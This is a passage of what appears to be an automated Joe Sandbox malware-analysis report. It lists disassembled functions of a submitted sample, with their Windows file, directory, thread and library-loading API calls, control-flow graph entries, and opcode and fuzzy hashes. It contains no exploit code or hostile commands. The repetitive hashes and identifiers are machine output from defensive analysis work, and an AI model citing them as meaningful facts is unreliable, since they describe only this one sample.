                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FileH_prolog3_HandleWrite
                                        • String ID:
                                        • API String ID: 2898186245-0
                                        • Opcode ID: 68d03a5d33ceaed458b416873a8b340b650fd84a76f5c0c857b707deb655710d
                                        • Instruction ID: 87a9b703edc29419c154351b77ecff180af283d4827267837706333a24629cae
                                        • Opcode Fuzzy Hash: 68d03a5d33ceaed458b416873a8b340b650fd84a76f5c0c857b707deb655710d
                                        • Instruction Fuzzy Hash: 9941D036A21215EBDF10DF64D884BED7B76BF89700F158158F905AB280CB709D64CBA1

                                        Control-flow Graph

                                        control_flow_graph 1368 27efef-27f00a call 2957d8 call 2813da 1373 27f031-27f033 1368->1373 1374 27f00c-27f00f 1368->1374 1376 27f035-27f03d call 27ed0d 1373->1376 1374->1373 1375 27f011-27f017 1374->1375 1377 27f01b-27f029 CreateDirectoryW 1375->1377 1378 27f019 1375->1378 1385 27f0e3-27f0f0 GetLastError 1376->1385 1386 27f043-27f065 call 28169a 1376->1386 1380 27f0d0-27f0d4 1377->1380 1381 27f02f 1377->1381 1378->1377 1383 27f0d6-27f0da call 27f58b 1380->1383 1384 27f0df-27f0e1 1380->1384 1381->1376 1383->1384 1389 27f0fb-27f100 call 295787 1384->1389 1385->1389 1390 27f0f2-27f0fa 1385->1390 1393 27f067-27f06e 1386->1393 1394 27f07d-27f087 1386->1394 1390->1389 1396 27f073-27f07b CreateDirectoryW 1393->1396 1397 27f070 1393->1397 1398 27f0bc-27f0ce 1394->1398 1399 27f089-27f09e 1394->1399 1396->1394 1397->1396 1398->1380 1398->1385 1400 27f0b3-27f0bb call 295726 1399->1400 1401 27f0a0-27f0b0 call 2719a9 1399->1401 1400->1398 1401->1400
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027EFF6
                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,0027EBA7,?,00000001,00000000,?,?,00000024,0027A4DE,?,00000001,?,?), ref: 0027F01F
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,0027EBA7,?,00000001,00000000,?,?,00000024,0027A4DE,?), ref: 0027F075
                                        • GetLastError.KERNEL32(?,?,00000024,0027EBA7,?,00000001,00000000,?,?,00000024,0027A4DE,?,00000001,?,?,00000000), ref: 0027F0E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$ErrorH_prolog3_Last
                                        • String ID:
                                        • API String ID: 3709856315-0
                                        • Opcode ID: 60649b2ef4940c288e2e2e6cc566f60ef02d3b0170107d42bd651dca0f82485f
                                        • Instruction ID: 13ab6bf2d6ae9a67272f05ade48e6232973dc5230c266a22119bfb5a349b29aa
                                        • Opcode Fuzzy Hash: 60649b2ef4940c288e2e2e6cc566f60ef02d3b0170107d42bd651dca0f82485f
                                        • Instruction Fuzzy Hash: 2731F771924209DBCF50DFE9CA88AEEBBF8AF48300F10842AE504E3351DB308951CB71
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0027E5D2,?,?,00000000,?,00000000), ref: 0027E029
                                        • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,0027E5D2,?,?,00000000,?,00000000), ref: 0027E041
                                        • GetLastError.KERNEL32(?,?,?,00000000,0027E5D2,?,?,00000000,?,00000000), ref: 0027E073
                                        • GetLastError.KERNEL32(?,?,?,00000000,0027E5D2,?,?,00000000,?,00000000), ref: 0027E092
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileHandleRead
                                        • String ID:
                                        • API String ID: 2244327787-0
                                        • Opcode ID: ae96e5923cc7bdc94f59288872ef2bf1e9b605db4f0fe1ea43d86493ced6cd76
                                        • Instruction ID: 8e1c897fcb95180ca8285a890dc8b5e3b7e942921df693a3a5ecc3a03681b3ad
                                        • Opcode Fuzzy Hash: ae96e5923cc7bdc94f59288872ef2bf1e9b605db4f0fe1ea43d86493ced6cd76
                                        • Instruction Fuzzy Hash: 7C11C230520219EBDF305F60D908B6E37A9FB49324F22C6A9E42EE5190CBF19D649B75
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0028FB52
                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,002C535C), ref: 0028FC24
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FileH_prolog3_Operation_wcslen
                                        • String ID: \S,
                                        • API String ID: 3104323202-967404722
                                        • Opcode ID: 9c55ea40d7db535f1174191ce7cf6a3f0dd69d8e97b646612c586dbd366acc7c
                                        • Instruction ID: 2a1da45084926282336cde9cb03b63a11cb8685df4ed476756ff9067f041eeaf
                                        • Opcode Fuzzy Hash: 9c55ea40d7db535f1174191ce7cf6a3f0dd69d8e97b646612c586dbd366acc7c
                                        • Instruction Fuzzy Hash: FC314571D21358DADB11EFE8C986ADCBBB4BF18314F54012EE119A7292DB705AA5CF10
                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 0028764C
                                        • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,0027736D,00275AB0,?), ref: 00287693
                                          • Part of subcall function 002792EB: __EH_prolog3_GS.LIBCMT ref: 002792F2
                                          • Part of subcall function 00279500: __EH_prolog3_GS.LIBCMT ref: 00279507
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_Thread$CreatePriority
                                        • String ID: CreateThread failed
                                        • API String ID: 3138599208-3849766595
                                        • Opcode ID: 8abcd1f025290641b690c85436c5a9666a89812dcfc4c800628c5fac0efd3382
                                        • Instruction ID: 332362be060c4c77c34b61d6ce194de9fac3b4c903a309111f4be4cabb728ff8
                                        • Opcode Fuzzy Hash: 8abcd1f025290641b690c85436c5a9666a89812dcfc4c800628c5fac0efd3382
                                        • Instruction Fuzzy Hash: 8601F2752697167BE6107E68AC85FA2739CEB42750F300529F94AA2181DAB1A8648728
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 00293C82
                                        • _wcslen.LIBCMT ref: 00293C99
                                          • Part of subcall function 00286A89: _wcslen.LIBCMT ref: 00286AA6
                                          • Part of subcall function 0027B03D: __EH_prolog3_GS.LIBCMT ref: 0027B044
                                          • Part of subcall function 0027B3E1: __EH_prolog3_GS.LIBCMT ref: 0027B3E8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                        • String ID: |Z,
                                        • API String ID: 1265872803-3492188443
                                        • Opcode ID: 44415677dfdc273c0892155e8aaf3b33399ae086e3c68be6411a15012bcfe882
                                        • Instruction ID: ca295d595a76810911cf67baf7981783dbad910d3db9f1776522625e171ecde3
                                        • Opcode Fuzzy Hash: 44415677dfdc273c0892155e8aaf3b33399ae086e3c68be6411a15012bcfe882
                                        • Instruction Fuzzy Hash: 5511AC359319B09FC705EB64AC15FDD7BA49B16310F40429EE44897253CBB0AAD4CFA1
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027DEA1
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,0027E8F5,?,?,0027A6B9,?,00000011,?), ref: 0027DF15
                                        • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,0027D303,?,?,?), ref: 0027DF65
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CreateFile$H_prolog3_
                                        • String ID:
                                        • API String ID: 1771569470-0
                                        • Opcode ID: 273f9ba8bfa952dc55b2e04a985e158110712569f7cb072164a59e8c9df1b84d
                                        • Instruction ID: c221011f1dc6ee6d06df4cc7d59ce86907ed7ed1fb31f9021c1675d69b321a16
                                        • Opcode Fuzzy Hash: 273f9ba8bfa952dc55b2e04a985e158110712569f7cb072164a59e8c9df1b84d
                                        • Instruction Fuzzy Hash: 394180709202099FDF14DFA4D889BEEB7F8AF09320F10961EE056A6281D774A9548B25
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 00286C65
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00286C9A
                                        • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00286D0C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                        • String ID:
                                        • API String ID: 1552931673-0
                                        • Opcode ID: 24656a0859593abb8f9647a12cc70770fa676c64c16812b4f2e1dce13c32e077
                                        • Instruction ID: 35763d9011d210bde53cd87506977fe203ec44d1124984ba18c32a58ad3b6593
                                        • Opcode Fuzzy Hash: 24656a0859593abb8f9647a12cc70770fa676c64c16812b4f2e1dce13c32e077
                                        • Instruction Fuzzy Hash: 0031AE75E20208DBCF04EBE4C889BEEBBB8AF48314F10411EE505B7281DB345A65CF65
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027F592
                                        • SetFileAttributesW.KERNELBASE(?,?,00000024,0027A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0027F5A8
                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049), ref: 0027F5EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AttributesFile$H_prolog3_
                                        • String ID:
                                        • API String ID: 2559025557-0
                                        • Opcode ID: e6db0eb333604af733b5227c5ca0dbc14860523401ac58ce5910ad6251ddf66b
                                        • Instruction ID: 1376c4d55a82c8112d02bf6800a80a5e15779d3913ab0e053d4601781f90015c
                                        • Opcode Fuzzy Hash: e6db0eb333604af733b5227c5ca0dbc14860523401ac58ce5910ad6251ddf66b
                                        • Instruction Fuzzy Hash: A8112970924219EBCF04DFA4E985ADEB7B8BF08310F14802AF514E7250DB349A65CF64
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027EC6A
                                        • DeleteFileW.KERNELBASE(?,00000024,0027D6F7,?), ref: 0027EC7D
                                        • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 0027ECBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: DeleteFile$H_prolog3_
                                        • String ID:
                                        • API String ID: 3558260747-0
                                        • Opcode ID: 3e50de2cf350b34e225b3a6322d2dcfca4d95e63a0e9a6ab71329abff131d591
                                        • Instruction ID: 310b3af7e391a6612541c12f1ffdec72cbee03f5379c0c068834a2478a762560
                                        • Opcode Fuzzy Hash: 3e50de2cf350b34e225b3a6322d2dcfca4d95e63a0e9a6ab71329abff131d591
                                        • Instruction Fuzzy Hash: EF110A75D20219DBDF05DFA4E989AEEB7B8AF0D310F14502AE504E7250DB349AA4CF74
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027ED26
                                        • GetFileAttributesW.KERNELBASE(?,00000024,0027ED16,00000000,0027A4A1,D946AC94,?,0027CDDD,?,?,?,?,?,?,?,?), ref: 0027ED39
                                        • GetFileAttributesW.KERNELBASE(?,?,?), ref: 0027ED79
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AttributesFile$H_prolog3_
                                        • String ID:
                                        • API String ID: 2559025557-0
                                        • Opcode ID: 5511a2f76ca6eec24f21cbcd1706ced217d5f44c8930bdbb8eabf136c27c8151
                                        • Instruction ID: 509e194c7d5f0061b61fbe5460afa233a9de516f05be928cfc40570d909b168b
                                        • Opcode Fuzzy Hash: 5511a2f76ca6eec24f21cbcd1706ced217d5f44c8930bdbb8eabf136c27c8151
                                        • Instruction Fuzzy Hash: 55113774920218DBCF14EFE8E8899EDB7F9AF4D310F14442AE504F3280DB309A548B74
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: bf81d63f212d3a5ec2066679540f4f4223f5b6a47c51673c79ad63ce11793d5e
                                        • Instruction ID: 185ac7f4323d844864ca748e49d91d686398a33c6a23fbabf045374bf613ce52
                                        • Opcode Fuzzy Hash: bf81d63f212d3a5ec2066679540f4f4223f5b6a47c51673c79ad63ce11793d5e
                                        • Instruction Fuzzy Hash: 5CB0128127C0016C360472157E02D37011CC0C5B51330471EF804C1581D4C14E730431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 0182094c468073eadc2e385ada9fd2103671ac77ce7692ff403289609ad5dd9e
                                        • Instruction ID: 75f891bfacc9fe7af1631f8e511fdb33c960cbc8281c8790e8859b86a26ad38f
                                        • Opcode Fuzzy Hash: 0182094c468073eadc2e385ada9fd2103671ac77ce7692ff403289609ad5dd9e
                                        • Instruction Fuzzy Hash: 3FB0128127C1016C374472157D02D37011CC0C5B51330471EF404C1581D4C04DB20431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: ee868c4bc5bc5062a11c583b43d0ab2ce0abbe6fbf6c22c9a831cfebe66c54e2
                                        • Instruction ID: 2c15b8595a550a56a5029b095ab5e2150f0be6ffc8b7ccc5294b2227d276bcbf
                                        • Opcode Fuzzy Hash: ee868c4bc5bc5062a11c583b43d0ab2ce0abbe6fbf6c22c9a831cfebe66c54e2
                                        • Instruction Fuzzy Hash: 89B0128527C1016C360472143D02D37010CC0C6B51330861EF804C1681D4C05D720431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 38659ccc35d4ae37cf7a04096f888b8ec1e498b080a9b69d5d781f717dd8e9be
                                        • Instruction ID: eeaf46bf4b45b0e8e8cc09e2f597aa0795624af62a31d5ebecf78741ab4646b7
                                        • Opcode Fuzzy Hash: 38659ccc35d4ae37cf7a04096f888b8ec1e498b080a9b69d5d781f717dd8e9be
                                        • Instruction Fuzzy Hash: 00B0128127C1016C360472147D02D37011CC0C5B51330471FF404C1581D4C04D720431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: d33d438056a6df595c4c7a9febb59f4be3cd52192b5e299629eed1d911f78d1d
                                        • Instruction ID: f0b24bf8f67149a116ab5d65dea8d58ed7269d4ffdb2674693cb5388ccb0eff9
                                        • Opcode Fuzzy Hash: d33d438056a6df595c4c7a9febb59f4be3cd52192b5e299629eed1d911f78d1d
                                        • Instruction Fuzzy Hash: 5CB0129127C0017C360432113E02D37020CC4C1B51331461EF800C048298C25E730431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 8024a96be05a96642512d2cfc92e8a6cda65da4bf6bc76b2058ffe798cc3ebf9
                                        • Instruction ID: 493d66392755bf6aca9ac5560c03d028dbeed71632e47f7c8f665bd451fe7376
                                        • Opcode Fuzzy Hash: 8024a96be05a96642512d2cfc92e8a6cda65da4bf6bc76b2058ffe798cc3ebf9
